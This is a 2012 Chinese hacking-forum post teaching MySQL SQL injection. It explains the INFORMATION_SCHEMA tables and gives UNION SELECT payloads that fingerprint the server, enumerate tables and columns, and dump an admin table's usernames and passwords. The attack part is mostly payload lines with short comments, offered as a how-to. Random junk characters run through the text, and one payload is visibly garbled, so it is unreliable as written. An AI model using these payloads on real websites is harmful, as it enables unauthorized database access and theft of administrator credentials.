找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1966|回复: 0
打印 上一主题 下一主题

mysql常规注入

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:48:44 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
本文介绍MYSQL盲注的一些语句和方法
! H9 p* [8 O4 ]$ w. ~9 }, ?
- [7 l- V; i1 T6 s! z( t9 K学习盲注前先了解下 IFORMATION_SCHEMA 库
, [+ P; z$ Q( i: }/ H
4 M- b9 b; I! O: T8 M- x) oMysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有. O# L: u7 g" B, i& L! l
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。( s6 B1 E  c+ d% s# o
1.得到所有数据库名:5 m" J8 Q0 [$ I$ {1 ^* n8 n
|SCHEMATA ->存储数据库名的表3 |& b4 y$ a: e3 @
|---字段:SCHEMA_NAME ->数据库名称4 l" ?7 ?) i# e8 g# D

9 S- m2 U( ~& U|TABLES ->存储表名8 r& O+ X1 Y4 n! H
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名' B( P) ~- ^0 D" L8 ^
|---字段:TABLE_NAME ->存储表的表名
& o6 ^4 f/ b  h4 A6 Q1 Q& I2 ~' Q9 W4 b. T
|COLUMNS ->存储的字段名表
+ ^' w& R3 |! {9 }2 P|---字段:TABLE_SCHEMA ->该字段所属数据库名" w" s( G9 U/ V4 e' k; q- M
|---字段:TABLE_NAME ->存储所属表的名称5 |( S6 w& U$ C  m5 ]

6 \* k+ `2 a% b2 {4 m& I|---字段:COLUMN_NAME ->该字段的名称) \* C  w. o% \6 U
( X7 f1 p9 }* U: d( E8 d

% i  x* q/ E% e) F3 z2 |9 S, [
2 p# p) X4 e# ~# y! ?# E###########################################################################8 z" y6 \7 k4 R) [
" R) o% j: r5 H- ]' }" {! O
0x001 获取系统信息:- Q' E( B& S9 y+ W+ h& C% `

# U  \6 L% Q% f2 ]" L; t4 ~union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
: K9 S2 Q) P( d7 e# K" N& ^
" C" W1 T! J2 T' {& ~- H& q/*
/ }% v8 F3 v, i* \  ]' ^' D7 N3 }' L, J3 }
@@global.version_compile_os 获取系统版本; b7 _# Q2 }8 ~7 i0 S* w+ L
+ P/ }5 S$ c: t+ S5 |
@@datadir 数据库路径
$ O2 D; ?- s- _database() 当前数据库名称7 b/ S1 {4 X: g& \) q6 H
0x3c62723e 换行HEX值$ h; ^+ t/ T3 j' G2 ^# b

2 L' V: d+ Z8 W3 s% R*/) p% k  N& [. R. V, O5 r$ j

! R& P$ f- R0 b- u( ^/ ~4 u & m; k) L" v$ y
4 W9 {! @# k' [3 P
######################################################################
" n* T$ }- {" X5 {, }0 t1 a+ K  u7 O4 }7 f4 {; F: ?% K7 H) p
0x002 获取表名* f+ l; \9 I, A5 s$ r9 l+ B! l

# q, G& e: B6 c$ D9 b, u) zunion select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*6 g, |% o) n3 h0 t$ K$ z- ^% s- W
; i  g  I1 \2 {1 m
# L8 B  @; r0 j. W

# \6 ^8 b' [0 H4 w3 N0 c/*
! ~: q" @0 J. S
9 L: i3 H  q. N! r" |+ T3 b) Y- m0x67617264656e 为当前数据库名0 K! w. x9 v4 P9 F% A8 Y2 h4 D

% z( x6 b8 |; U1 i4 Rgroup_concat(table_name) 使用group_concat函数 一步获得该库所有表名
; ?6 H( R* `# Q9 E5 z6 T
# D. d8 a; [$ p( Z1 ]*/
$ q( b0 u! ?  t  y
7 N& S; V" }* Z+ M. q######################################################################3 ~" g' R8 T8 w& j

7 v  n' K& A( ?2 r6 a& \
' |. m7 f% j* f+ n7 V6 R0 _! J9 {- {
0x003 获取字段
  x. e5 S( F" O0 L: X% [1 z1 I7 \1 i# y: N0 f! ]
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
) n# v0 H1 o7 q- k; A" p
! z! v9 M4 m4 E) U. C/*
: H* a' i3 G- V1 l# w7 ~0 G% w8 r. E* Z) _
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
, h' w, K( }3 c+ |
$ K$ I: f/ T& e3 w/ k  X0x61646d696e ->选择一个表
2 l: M9 q8 |! r) b$ a
* U8 o6 R- O& C/ B( [+ @6 c4 M0x67617264656e ->数据库名
) Y3 m, ~3 u# W2 b; t! |6 f2 _5 q; \  K+ A$ B. \/ k( r
*/+ d5 r/ j6 S# G, g& t" e
5 w  h) l" e' J% n3 j6 h
#####################################################################: U7 {- u, v! u# l; c3 C2 C
4 {3 @. e: v+ l9 T
5 j) Z* q9 b, v& b4 T+ q6 u8 G

* O' g- a' N4 {; m+ F; A. ?% [6 N0x004 获取数据
5 d# k. T5 ~+ r8 E
. \: a4 Z7 k2 o8 Q' x( B4 i1 yunion select 1,2,3
. i$ @# @( P8 ~5 r& h4 Q,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
. I0 c1 @0 A) g8 r# R1 ?  E1 k) {, d+ q1 m# R# ]+ t
union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin1 T: u: C$ w  X+ b3 z% _. }
0 j# c3 y: X% Z: M/ _2 ]

: C+ t. q5 ^1 a1 u& U- k/ o' R
2 @) a2 D, s9 I0 m0 Y8 U* w0 s/** F& i9 I9 D3 E: U) r. n

! L& B0 m! L7 y0x3c62723e 换行符号HEX编码
) h$ L( w( l3 c0 j# U( }
, t! b2 P- [& I, w, Q* x5 Ogroup_concat 同时获得该字段所有数据' S. N9 s% M2 W! Q+ z

$ x- i* m1 d% i! \*/
1 g4 w6 M% s- G' y9 w9 P6 J
) J( o* X* M+ y3 S, J# N
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表